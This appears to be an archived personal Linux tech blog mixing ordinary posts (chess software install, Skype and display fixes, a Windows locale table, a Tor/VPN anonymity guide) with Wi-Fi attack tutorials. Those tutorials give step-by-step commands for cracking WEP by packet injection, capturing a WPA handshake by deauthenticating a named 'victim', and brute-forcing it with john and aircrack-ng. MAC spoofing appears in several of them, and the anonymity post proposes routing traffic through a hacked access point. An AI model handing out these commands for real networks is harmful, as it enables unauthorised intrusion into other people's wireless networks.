Tuesday, 18 December 2012

Saturday, 1 December 2012

Tuesday, 13 November 2012

Monday, 12 November 2012

Scid vs PC installation guide - Ubuntu (Mint, Debian etc.)


Scid vs PC is definitely the best and most comprehensive chess software for Linux.  Unfortunately I struggled quite a bit to get it up and running.

Before I start: You might prefer to watch the video. Otherwise keep on reading.


Open a terminal and execute the following commands

sudo apt-get install auto-apt build-essential
sudo auto-apt update-local
sudo auto-apt update
sudo auto-apt updatedb

Now make sure you have both tcl8.5-dev and tk8.5-dev installed

sudo apt-get install tcl8.5-dev tcl8.5
sudo apt-get install tk8.5-dev tk8.5

Some users are reporting problems on Ubuntu 14.04. If you are affected, try the 8.6 packages:
sudo apt-get install tcl8.6-dev tcl8.6
sudo apt-get install tk8.6-dev tk8.6 libgcj15-dev

Download Scid vs PC: http://sourceforge.net/projects/scidvspc/files/source/scid_vs_pc-4.9.tgz/download
The 'x' in the commands below refers to the current release, e.g. 4.9.tgz
tar -xzf scid_vs_pc-4.x.tgz
cd scid_vs_pc-4.x
sudo auto-apt run ./configure
sudo auto-apt run make
sudo auto-apt run make install
This should work. If you encounter any problems, please let me know.

Sunday, 11 November 2012

Friday, 19 October 2012

Wednesday, 17 October 2012

How to be anonymous on the internet (99-100%)

Updated: 06/2016

Summary: Tor Browser is not enough. This short tutorial will help you to significantly improve your security in only 15 minutes. 

Your online privacy is under attack. Government agencies (NSA, FBI etc.) and private companies (e.g. Google) are snooping on you. You will find a lot of tips on the web to achieve online anonymity, but most of it is useless.

The information below will give you a rock-solid setup in a reasonable amount of time. If you run into any problems post a comment and I will help you out.

It is possible to avoid being tracked, but to stay anonymous online you need a) a good setup and b) common sense.

My setup | User -> VPN -> Tor -> Internet

Using Tor alone is often not enough, as a Harvard student had to learn when he emailed a bomb threat to campus officials to avoid having to write a final exam. He was deanonymized by the fact that he was the only person using Tor on the campus network at the time the email was sent.

A VPN will hide the fact that you are using Tor from your Internet service provider or the network you are connected to. Choosing a VPN which can be trusted is extremely important. Companies such as Hide My Ass will reveal your identity as soon as someone knocks on their door. Money spent on this kind of operator is completely wasted.

Step 1: VPN

Find a good VPN provider. I am using NordVPN. Their servers are operated under the jurisdiction of Panama, they have a no logs policy and it is possible to pay in Bitcoins for their services.

After you have signed up, install OpenVPN or use NordVPN's software and connect to the NordVPN network or the network of your VPN provider of choice.

A VPN will add a layer of protection regardless of whether you decide to proceed with Step 2 or not.

Step 2: Virtual Environment and Tor

Next, download VirtualBox and Whonix-Workstation/Gateway, which is a security-focused Linux distribution that tunnels ALL traffic through Tor. Install VirtualBox.


Open VirtualBox and import the two (!) .ova files (Whonix) into VirtualBox. To do this go to File --> Import Appliance.


First start Whonix-Gateway.


As soon as you see the Desktop of Whonix-Gateway go back to VirtualBox and start Whonix-Workstation. 

Everything you do (i.e. surfing the deep web) is done on Whonix-Workstation.


Important: USE your brain.

The best possible setup won't help you if you are careless and log in to your normal Facebook/Gmail account while hiding behind VPNs and Tor. Do not use your everyday email address and do not use your everyday username for any anonymous activity online.

Unfortunately people make mistakes, but by using a virtual environment (Whonix) you can greatly mitigate that risk. It will help you separate your two identities and thus stay truly anonymous online.

If you have any questions or problems, please write a comment below.


EXTRA (You don't need this)
Please be aware that the following is of theoretical nature only. Breaking into networks without consent is illegal.

In theory the following setup would make it impossible to track somebody down: User --> hacked Wireless Access Point Router --> VPN --> Tor (Whonix) --> Internet

Don't use Windows, but a clean install of Debian instead. Make sure you enable full disk encryption (password should be a minimum of 30 characters).

Securely erase your HDD: Boot from an Ubuntu live CD. Install wipe (sudo apt-get install wipe) and wipe the hard disk drive.

WEP poses a significant security risk: http://ubuntu-skype.blogspot.co.at/2012/08/how-to-crack-wep-with-aircrack-ng.html

An adversary will most likely change his MAC address. This can be done via macchanger, e.g. macchanger -r wlan0



Tuesday, 11 September 2012

Brute forcing WPA/WPA2 handshake with john the ripper

Please refer to this article for a tutorial on how to obtain a handshake.

How to crack WPA/WPA 2 with aircrack-ng (Backtrack 5) 

The limitation of a dictionary attack is that unless the password is in your dictionary file, your attack won't be successful. Another way to obtain the password is to brute force it with john the ripper. In theory it is possible to crack ANY password with this method, but it might take a million years to crack a full 128 ASCII characters password with your computer.

Ok, the command:

This was on Backtrack
/pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b (bssid) -w file.cap (wpa handshake file)

Debian
sudo apt-get install john
/usr/sbin/john --stdout --incremental:all | aircrack-ng -b (bssid) -w file.cap (wpa handshake file)


By default john will only try passwords with 8 characters or less. However, the minimum pass-phrase length for WPA is 8. You need to edit the john.conf file to change the max length of the output.

"--incremental:all" means that john will try all 128 ASCII characters, which will take thousands of years to complete if the password has a proper length. You can also try -i:digits for numbers only or -i:alpha for a to z.
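
Seen from the defender's side, the same numbers tell you how long your own passphrase would survive an exhaustive search. The following is an added example, not part of the original post: it finds the narrowest of the modes mentioned above that covers a passphrase and estimates the worst-case search size. The charset sizes, the use of the 95 printable ASCII characters for "all" and the guess rate are assumptions.

```python
import string

# Charsets modelled on the modes named in the post. Sizes are assumptions:
# "digits" = numbers only, "alpha" = a to z, and "all" is taken as the 95
# printable ASCII characters a WPA passphrase may contain.
MODES = [
    ("digits", set(string.digits)),
    ("alpha", set(string.ascii_lowercase)),
    ("all", {chr(c) for c in range(32, 127)}),
]
WPA_MIN, WPA_MAX = 8, 63          # passphrase length limits for WPA/WPA2-PSK
GUESSES_PER_SECOND = 100_000      # assumed guess rate, adjust to your threat model
SECONDS_PER_YEAR = 365 * 24 * 3600


def smallest_mode(passphrase):
    """Return (name, charset size) of the narrowest mode covering the passphrase."""
    for name, charset in MODES:
        if set(passphrase) <= charset:
            return name, len(charset)
    raise ValueError("passphrase contains characters outside printable ASCII")


def candidates_up_to(charset_size, length):
    """Count candidates of WPA-valid length (8..length) over the given charset."""
    return sum(charset_size ** n for n in range(WPA_MIN, length + 1))


def audit(passphrase, rate=GUESSES_PER_SECOND):
    """Worst-case exhaustive-search cost for one passphrase."""
    if not WPA_MIN <= len(passphrase) <= WPA_MAX:
        raise ValueError("WPA passphrases are 8 to 63 characters long")
    mode, size = smallest_mode(passphrase)
    total = candidates_up_to(size, len(passphrase))
    return {"mode": mode, "candidates": total,
            "years": total / rate / SECONDS_PER_YEAR}


if __name__ == "__main__":
    # Constructed sample passphrases, not taken from any real network.
    for sample in ["12345678", "chessfan", "Scid-vs-PC 4.9!", "correct horse battery"]:
        r = audit(sample)
        print(f"{sample!r:26} mode={r['mode']:6} "
              f"candidates={r['candidates']:.3e} worst case ~{r['years']:.3g} years")
```

An eight-digit passphrase falls within minutes at the assumed rate, while every extra character from the full printable set multiplies the search by 95.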

Good luck.

P.S.: You might be interested in this simple Linux dictionary password cracker written in python:  Article

Friday, 7 September 2012

Wednesday, 29 August 2012

How to increase your bandwidth in Win 7

For once, a tip for Win 7. Windows uses up to 20% of the bandwidth, but you can change this with the following steps.

Run gpedit.msc

==> administrative settings ==>  network ==> qos packet scheduler ==> open LIMIT RESERVABLE BANDWIDTH

==> click on ENABLE and limit bandwidth to 0%.

Restart.

That's it!

Tuesday, 28 August 2012

Linux Mint 13 - Black screen fix (live USB)

Recently I switched from Ubuntu to Linux Mint 13 on my HP mini netbook. Unfortunately I encountered a  'black-screen problem' similar to the one I already knew from Backtrack 5 (http://ubuntu-skype.blogspot.co.at/2012/07/backtrack-5-black-screen-after-startx.html ).

The solution was:

press TAB
add one of the following to the line "..... ...... .... quiet splash" (depending on the chipset of your video card):

radeon.modeset=1
i915.modeset=1

If that does not work for you try to add "driver=intel". E.g. quiet splash i915.modeset=1 driver=intel.


I had success with that. Hope it works for you too!

Sunday, 19 August 2012

Tuesday, 14 August 2012

How to crack WEP with aircrack-ng (Backtrack)

Anybody should be able to do this. If you struggle with something, post a comment and I'll get back to you.

Requirements
- Backtrack (or Linux with aircrack-ng installed)
- Virtual machine (e.g. Vmware or Virtualbox)
- USB Wifi adapter (you will need a wifi adapter which you can put in promiscuous mode. It won't work with your built-in notebook wifi card etc.) Buy this one: Alfa AWUS036H. It is cheap, reliable and works out of the box.

Commands
  1. airmon-ng stop wlan0
  2. ifconfig wlan0 down
  3. macchanger -m 00:11:22:33:44:55 wlan0
  4. ifconfig wlan0 up
  5. airmon-ng start wlan0 
  6. ifconfig mon0 down
  7. macchanger -r (random mac) mon0
  8. ifconfig mon0 up
  9. airodump-ng mon0 (scan for APs)
  10. Wait for a minute
  11. CTRL + C (stop scanning)
  12. Pick your own AP with WEP encryption
  13. airodump-ng -c (channel) -w (filename) --bssid (xx:xx:xx:xx:xx:xx) mon0
    • -w file, in which the data will be saved.
  14. —You need around 10k of data to successfully crack WEP—
  15. Open another console
  16. aireplay-ng -1 0 -a (BSSID) -e (ESSID) mon0
  17. Wait for "Association successful"
  18. aireplay-ng -3 -b (BSSID) -e (ESSID) mon0 (starts the injection)
    • data in the other console should now  increase significantly
  19. open another console
  20. aircrack-ng (filename.cap) 
    •  path to the file from step 13. e.g. ~/Desktop/test.cap
  21. Wait for —Key Found—
  22. Enter Key without ‘:’.
This can be done in approx. 10 minutes. Have fun!

How to crack WPA/WPA 2 with aircrack-ng (Backtrack 5)

What you need

  • Backtrack (or Linux with aircrack-ng installed)
  • Virtual machine (e.g. Vmware or Virtualbox)
  • Password list
  • USB Wifi adapter capable of promiscuous mode: Alfa AWUS036H



Alright, fire up the terminal.

Commands

  1. airmon-ng
  2. airmon-ng start wlan0
  3. ifconfig mon0 down
  4. macchanger -m 00:11:22:33:44:55 mon0
  5. ifconfig mon0 up
  6. airodump-ng mon0 (let it scan for a minute)
  7. CTRL + C (stop)
  8. airodump-ng -c (channel) -w (filename, e.g. wpa) --bssid (xx:xx:xx:xx:xx:xx) mon0

 Now, we need to deauthenticate a user's pc currently on the network (mac)

  1. open another console
  2. aireplay-ng --deauth 1 (just one!) -e (ESSID) -c  (victim's mac) mon0
  3. Wait for WPA handshake ==> airodump-ng
  4. —-all cracking can be done offline—-
  5. aircrack-ng -w (wordlist) file (eg. WPA-01.cap)
    • this is the file from step 8
Note: Success of attack depends on whether your word-list contains the password or not.




Any problems? Ask!


Wednesday, 9 May 2012

''another skype instance may exist''

You want to log in to Skype, but you can't because you receive the following error: ''another skype instance may exist''.

This seems to be a common problem with Skype and Ubuntu.

Solution:

1) Open the terminal. (Dash Home: type: terminal)
2) Type ps aux
3) Look for the skype process and the process number
4) Type kill -9 xxxx (process nr. eg. 4557)
5) Start Skype and login.

Does this work for you? Leave me a comment!

Saturday, 3 March 2012

Locales for Windows XP and Windows Server 2003



0436 = "af;Afrikaans"
041C = "sq;Albanian"
0001 = "ar;Arabic"
0401 = "ar-sa;Arabic (Saudi Arabia)"
0801 = "ar-iq;Arabic (Iraq)"
0C01 = "ar-eg;Arabic (Egypt)"
1001 = "ar-ly;Arabic (Libya)"
1401 = "ar-dz;Arabic (Algeria)"
1801 = "ar-ma;Arabic (Morocco)"
1C01 = "ar-tn;Arabic (Tunisia)"
2001 = "ar-om;Arabic (Oman)"
2401 = "ar-ye;Arabic (Yemen)"
2801 = "ar-sy;Arabic (Syria)"
2C01 = "ar-jo;Arabic (Jordan)"
3001 = "ar-lb;Arabic (Lebanon)"
3401 = "ar-kw;Arabic (Kuwait)"
3801 = "ar-ae;Arabic (U.A.E.)"
3C01 = "ar-bh;Arabic (Bahrain)"
4001 = "ar-qa;Arabic (Qatar)"
042D = "eu;Basque"
0402 = "bg;Bulgarian"
0423 = "be;Belarusian"
0403 = "ca;Catalan"
0004 = "zh;Chinese"
0404 = "zh-tw;Chinese (Taiwan)"
0804 = "zh-cn;Chinese (China)"
0C04 = "zh-hk;Chinese (Hong Kong SAR)"
1004 = "zh-sg;Chinese (Singapore)"
041A = "hr;Croatian"
0405 = "cs;Czech"
0406 = "da;Danish"
0413 = "nl;Dutch (Netherlands)"
0813 = "nl-be;Dutch (Belgium)"
0009 = "en;English"
0409 = "en-us;English (United States)"
0809 = "en-gb;English (United Kingdom)"
0C09 = "en-au;English (Australia)"
1009 = "en-ca;English (Canada)"
1409 = "en-nz;English (New Zealand)"
1809 = "en-ie;English (Ireland)"
1C09 = "en-za;English (South Africa)"
2009 = "en-jm;English (Jamaica)"
2809 = "en-bz;English (Belize)"
2C09 = "en-tt;English (Trinidad)"
0425 = "et;Estonian"
0438 = "fo;Faeroese"
0429 = "fa;Farsi"
040B = "fi;Finnish"
040C = "fr;French (France)"
080C = "fr-be;French (Belgium)"
0C0C = "fr-ca;French (Canada)"
100C = "fr-ch;French (Switzerland)"
140C = "fr-lu;French (Luxembourg)"
043C = "gd;Gaelic"
0407 = "de;German (Germany)"
0807 = "de-ch;German (Switzerland)"
0C07 = "de-at;German (Austria)"
1007 = "de-lu;German (Luxembourg)"
1407 = "de-li;German (Liechtenstein)"
0408 = "el;Greek"
040D = "he;Hebrew"
0439 = "hi;Hindi"
040E = "hu;Hungarian"
040F = "is;Icelandic"
0421 = "in;Indonesian"
0410 = "it;Italian (Italy)"
0810 = "it-ch;Italian (Switzerland)"
0411 = "ja;Japanese"
0412 = "ko;Korean"
0426 = "lv;Latvian"
0427 = "lt;Lithuanian"
042F = "mk;FYRO Macedonian"
043E = "ms;Malay (Malaysia)"
043A = "mt;Maltese"
0414 = "no;Norwegian (Bokmal)"
0814 = "no;Norwegian (Nynorsk)"
0415 = "pl;Polish"
0416 = "pt-br;Portuguese (Brazil)"
0816 = "pt;Portuguese (Portugal)"
0417 = "rm;Rhaeto-Romanic"
0418 = "ro;Romanian"
0818 = "ro-mo;Romanian (Moldova)"
0419 = "ru;Russian"
0819 = "ru-mo;Russian (Moldova)"
0C1A = "sr;Serbian (Cyrillic)"
081A = "sr;Serbian (Latin)"
041B = "sk;Slovak"
0424 = "sl;Slovenian"
042E = "sb;Sorbian"
040A = "es;Spanish (Traditional Sort)"
080A = "es-mx;Spanish (Mexico)"
0C0A = "es;Spanish (International Sort)"
100A = "es-gt;Spanish (Guatemala)"
140A = "es-cr;Spanish (Costa Rica)"
180A = "es-pa;Spanish (Panama)"
1C0A = "es-do;Spanish (Dominican Republic)"
200A = "es-ve;Spanish (Venezuela)"
240A = "es-co;Spanish (Colombia)"
280A = "es-pe;Spanish (Peru)"
2C0A = "es-ar;Spanish (Argentina)"
300A = "es-ec;Spanish (Ecuador)"
340A = "es-cl;Spanish (Chile)"
380A = "es-uy;Spanish (Uruguay)"
3C0A = "es-py;Spanish (Paraguay)"
400A = "es-bo;Spanish (Bolivia)"
440A = "es-sv;Spanish (El Salvador)"
480A = "es-hn;Spanish (Honduras)"
4C0A = "es-ni;Spanish (Nicaragua)"
500A = "es-pr;Spanish (Puerto Rico)"
0430 = "sx;Sutu"
041D = "sv;Swedish"
081D = "sv-fi;Swedish (Finland)"
041E = "th;Thai"
0431 = "ts;Tsonga"
0432 = "tn;Tswana"
041F = "tr;Turkish"
0422 = "uk;Ukrainian"
0420 = "ur;Urdu"
042A = "vi;Vietnamese"
0434 = "xh;Xhosa"
043D = "ji;Yiddish"
0435 = "zu;Zulu"

Thursday, 2 February 2012